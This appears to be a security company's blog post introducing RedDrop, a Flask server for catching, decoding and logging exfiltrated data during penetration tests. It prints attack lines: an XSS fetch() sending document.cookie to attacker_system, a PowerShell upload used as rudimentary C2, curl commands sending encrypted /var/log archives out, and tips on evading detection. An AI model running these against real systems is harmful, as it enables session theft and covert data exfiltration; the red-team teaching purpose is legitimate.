Data Exfiltration using RedDrop
This post is part of a series on data extraction techniques on Linux Systems; though in this post I will provide a Windows example as well. If you like what you read here, be sure to stay tuned for additional articles! You can view the released articles here:
Introduction
In this article, I’ll introduce you to RedDrop a new tool I’ve built to capture, decode, decrypt, extract, log, and display output from your data exfiltration procedures. I’ll be using techniques from both of my previous articles on command output extraction and data exfiltration, and also introduce some operating procedures and examples which may help you in your future assessments.
What is RedDrop?
RedDrop is a web server built in Flask for Python which offers functionality for:
- Capturing data in HTTP requests.
- File upload and storage to the local file system.
- Automatic Parsing, Decoding, and Decrypting files and parameters in HTTP requests.
- Auto extraction of Gzip compressed Tar Archives.
- Verbose logging in JSON format for processing and analysis at a later time.
- Dynamic Authorization Parameters in the URI, Request Headers, and Request Parameters
So without further ado, let’s dive in and see how it all works. If you’d like to follow along, check out the source code here.
Or you can pull down my docker image and get setup immediately!
mkdir reddrop-demo
cd reddrop-demo
mkdir uploads logsdocker run -t -v "$PWD/uploads:/reddrop/uploads" -v "$PWD/logs:/reddrop/logs" -p "80:80" -n reddrop cyberbutler/reddrop -h
Demos
See it in action!
Capturing data in HTTP Requests
One of the main reasons I built RedDrop was for the cases where I needed to send arbitrary data to a remote web server. For example, cases where I had discovered XSS, SSRF, Command Injection, or any other scenario where I was able to send data from a remote system over HTTP/S.
RedDrop offers me the ability to capture that arbitrary data, customize the output, and log all parameters. For example, given the following XSS payload, which base64 encodes the cookies of the browser and sends them to attacker_system in a GET URL Parameter, cookies:
fetch(`http://attacker_system/?cookies=${btoa(document.cookie)}`)results in the following output in RedDrop:
As shown, RedDrop automatically detected the base64 encoded payload and ran it through the b64 processor, resulting in the decoded output in the console. Here is a list of the currently available processors:
hex, openssl-aes256-pbkdf2, gzip, b64Automatic request processing has some consequences. Namely in the case of base64 encoded data, it is difficult to determine if a string is actually encoded with base64 and is not something else. For example, the string abcd1234 is a valid base64 string, but does not decode to anything human readable. In cases such as this, its possible to tell RedDrop exactly what processor modules to run with the -p CLI argument. The following example forces the Base64 processor to run 3 times in a row on any request parameters received:
python3 reddrop-server.py -p b64 -p b64 -p b64Additionally, you can specify processing routines using either command line arguments for RedDrop or by specifying them directly in the request with the Process request header. Here's a Bash example of sending the output of uname -a encrypted with OpenSSL and encoded in GZip and Base64:
curl 172.17.0.1$PWD -F "uname -a=$(uname -a | openssl enc -aes-256-cbc -pass 'pass:EncryptMe' -md sha256 -pbkdf2 -e | gzip | base64)" -H 'Process: b64,gzip,openssl-aes256-pbkdf2'Notice the order of the Process header. This is important for the server to know how to process the payload properly. This should be a comma-separated string in the reverse order of encoding. See the RedDrop help banner (--help) for available options.
As you can see, the server knows how to decode and decrypt the parameter value, and will do so automatically.
Curious what this looks like on the wire? Here is a snippet from Wireshark:
RedDrop can also be useful for logging command output as a means of rudimentary C2. For example, if we had PowerShell access to a system, we could push output of commands over HTTP with something like this:
iwr -uri http://attacker_system/ -form @{'psversion' = $PSVersionTable | Out-String}
This example used a GET request, but the POST and PUT methods are supported as well. Parameters are parsed from the URI arguments and request body. The example PowerShell command passed its output in the request body, as shown in the following TCP Stream captured in Wireshark:
The server can also handle JSON payloads automatically, and treats each key/value pair as its own request parameter. Since RedDrop logs all request parameters individually, an application/json request would look like this in RedDrop:
{
"sub": "1234567",
"name": "John ",
"iat": {
"num": 1516239022
}
}
File Upload and Archive Extraction
A major point of RedDrop is file exfiltration. I wanted a tool that I could use to capture and store exfiltrated files during assessments that also allowed me to decrypt, decode, and extract files automatically. RedDrop enables HTTP file upload without any hassle. For example, the following RedDrop arguments allow me to upload tar archives with any number of encodings or encryption routines, which will be automatically decoded, decrypted, and extracted:
python3 reddrop-server.py -xRunning the following command will send two request parameters in a POST request to the RedDrop server, one containing the tar archive and the other showing a directory listing of the current directory (which is also denoted in the URI path of the request with $PWD). Each parameter is encoded differently:
tar cz /var/log | base64 | xxd -ps | gzip | openssl enc -aes-256-cbc -pass 'pass:EncryptMe' -e -a -pbkdf2 | curl 172.17.0.1$PWD -F 'logs=@-' -F "listing=`ls -al * | gzip | base64`"
As you can see, RedDrop is smart enough to determine the encodings and encryption of the received payloads and automatically reverse the obfuscation process to retrieve the original tar archive before extracting it to the file system.
Logging
The server displays the Time of the Request, Request IP Address, HTTP Method, URI, Parameter, and the Value, but these are not the only values that are recorded. Behind the scenes RedDrop logs request data to JSON files in the logs directory, which includes much more metadata. As an example, the previous request would result in the following JSON log:
This log file can be parsed later on, using tools like jq to sort through extracted information, or even pushing to your own central logging system like RedELK. Notably, the log includes the request headers, which are not displayed in the terminal by default when running RedDrop.
Authorization Rules
Thanks to some feedback from @N4k3dTurtl3 on his security concerns of file upload from anywhere, RedDrop now offers configurable authorization rules. These rules allow you to specify parameters, headers, and request URIs to match a regular expression in order for RedDrop to process a request. These rules can be defined in a YAML configuration file, or by passing the -r CLI argument (once for each rule).
python3 reddrop-server.py -r '<Key>=<Regular Expression>' -r '<Key>=<Regular Expression>'
Be careful! The Keys are case sensitive. If an authorization rule doesn’t work for you, make sure that you have the correct case!
Helper Functions for Your Operations
I wanted to conclude this post with two helper functions I’ve found particularly useful when I have gained SSH access to a system. These functions can be pasted into your shell and be used repeatedly for the duration of that session. I recommend you review these functions and how they might be enhanced for your own operations to avoid detection as they may leave obvious artifacts of malicious network activity.
First up, this logoutput function can be used to log the output and command run to a RedDrop server. This is useful for tracking unique commands and their output.
This next function is a quick wrapper for file exfiltration on a Linux system. You can use it to quickly exfil files without having to write out the command each time. Feel free to add obfuscation techniques that RedDrop can process! This one uses tar to archive the provided file/directory, and openssl to encrypt it and base64 encode it before uploading with curl:
Conclusion
RedDrop was created to be used in any kind of situation that requires a verbose web server for capturing dynamic sets of data. It can be tweaked with new data processors as needed and the output displayed can be changed through various configuration options. RedDrop offers multiple places to capture and store data, allowing for easy adoption into your operational workflow.
There is always room for improvement. I’m currently releasing this tool as-is and will push features as I or others need them. If you have ideas, head over to the GitHub repository and open an Issue or PR! I’ll do my best to work with you on a suitable implementation.
Maveris is an IT and cybersecurity company committed to helping organizations create secure digital solutions to accelerate their mission. We are Veteran-owned and proud to serve customers across the Federal Government and private sector. Maveris Labs is a space for employees and customers to ask and explore answers to their burning “what if…” questions and to expand the limits of what is possible in IT and cybersecurity. To learn more, go to maveris.com/#maveris-labs.
